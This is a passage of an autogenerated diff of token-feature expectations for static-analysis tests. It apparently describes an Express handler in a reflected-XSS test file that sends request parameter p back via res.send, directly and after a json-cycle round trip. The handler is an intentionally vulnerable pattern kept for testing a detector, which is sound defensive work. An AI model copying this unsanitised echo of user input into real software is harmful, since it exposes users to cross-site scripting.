req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:11 | { p } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:11 | { p } | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | { p } = req.params | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | { p } = req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:24 | { p } = req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:9:69:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:17 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:17 | req | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:17 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:24 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:24 | req.params | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:15:69:24 | req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:19:69:24 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:19:69:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:69:19:69:24 | params | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:69:19:69:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:69:19:69:24 | params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:9 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:9 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:9 | obj | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:9 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:9 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj = {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj = {} | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj = {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:71:7:71:14 | obj = {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:71:13:71:14 | {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:71:13:71:14 | {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:71:13:71:14 | {} | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:71:13:71:14 | {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:71:13:71:14 | {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:5 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:5 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:5 | obj | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:5 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:5 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:7 | obj.p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:7 | obj.p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:7 | obj.p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:7 | obj.p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:7 | obj.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:11 | obj.p = p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:11 | obj.p = p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:11 | obj.p = p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:11 | obj.p = p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:72:3:72:11 | obj.p = p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:72:7:72:7 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:72:7:72:7 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:72:7:72:7 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:72:7:72:7 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:72:7:72:7 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:72:11:72:11 | p | assignedToPropName | p | +| autogenerated/Xss/ReflectedXss/tst2.js:72:11:72:11 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:72:11:72:11 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:72:11:72:11 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:72:11:72:11 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:72:11:72:11 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:11 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:11 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:11 | other | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:11 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:11 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other = ... e(obj)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other = ... e(obj)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other = ... e(obj)) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other = ... e(obj)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:7:73:44 | other = ... e(obj)) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:16 | jc | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:16 | jc | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:16 | jc | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:16 | jc | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:16 | jc | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:27 | jc.retrocycle | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:27 | jc.retrocycle | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:27 | jc.retrocycle | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:27 | jc.retrocycle | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:27 | jc.retrocycle | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | exceptional return of jc.retr ... e(obj)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | exceptional return of jc.retr ... e(obj)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | exceptional return of jc.retr ... e(obj)) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | exceptional return of jc.retr ... e(obj)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | exceptional return of jc.retr ... e(obj)) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | jc.retr ... e(obj)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | jc.retr ... e(obj)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | jc.retr ... e(obj)) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | jc.retr ... e(obj)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:15:73:44 | jc.retr ... e(obj)) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:18:73:27 | retrocycle | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:18:73:27 | retrocycle | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:18:73:27 | retrocycle | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:18:73:27 | retrocycle | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:18:73:27 | retrocycle | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:30 | jc | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:30 | jc | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:30 | jc | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:30 | jc | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:30 | jc | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:38 | jc.decycle | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:38 | jc.decycle | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:38 | jc.decycle | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:38 | jc.decycle | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:38 | jc.decycle | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | exceptional return of jc.decycle(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | exceptional return of jc.decycle(obj) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | exceptional return of jc.decycle(obj) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | exceptional return of jc.decycle(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | exceptional return of jc.decycle(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | jc.decycle(obj) | CalleeFlexibleAccessPath | jc.retrocycle | | autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | jc.decycle(obj) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | jc.decycle(obj) | calleeImports | json-cycle | @@ -22151,6 +147526,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | jc.decycle(obj) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | jc.decycle(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:73:29:73:43 | jc.decycle(obj) | receiverName | jc | +| autogenerated/Xss/ReflectedXss/tst2.js:73:32:73:38 | decycle | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:73:32:73:38 | decycle | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:73:32:73:38 | decycle | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:73:32:73:38 | decycle | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:73:32:73:38 | decycle | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:73:40:73:42 | obj | CalleeFlexibleAccessPath | jc.decycle | | autogenerated/Xss/ReflectedXss/tst2.js:73:40:73:42 | obj | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:73:40:73:42 | obj | calleeImports | json-cycle | @@ -22160,6 +147540,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:73:40:73:42 | obj | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:73:40:73:42 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:73:40:73:42 | obj | receiverName | jc | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:5 | res | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:75:3:75:13 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:75:7:75:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:75:7:75:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:75:7:75:10 | send | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:75:7:75:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:75:7:75:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:75:12:75:12 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:75:12:75:12 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:75:12:75:12 | p | contextFunctionInterfaces | | @@ -22168,6 +147573,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:75:12:75:12 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:75:12:75:12 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:75:12:75:12 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:5 | res | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | exceptional return of res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | exceptional return of res.send(other.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | exceptional return of res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | exceptional return of res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | exceptional return of res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | res.send(other.p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:76:3:76:19 | res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:76:7:76:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:7:76:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:76:7:76:10 | send | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:76:7:76:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:76:7:76:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:16 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:16 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:16 | other | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:16 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:16 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:18 | other.p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:18 | other.p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:18 | other.p | contextFunctionInterfaces | | @@ -22176,12 +147611,51 @@ tokenFeatures | 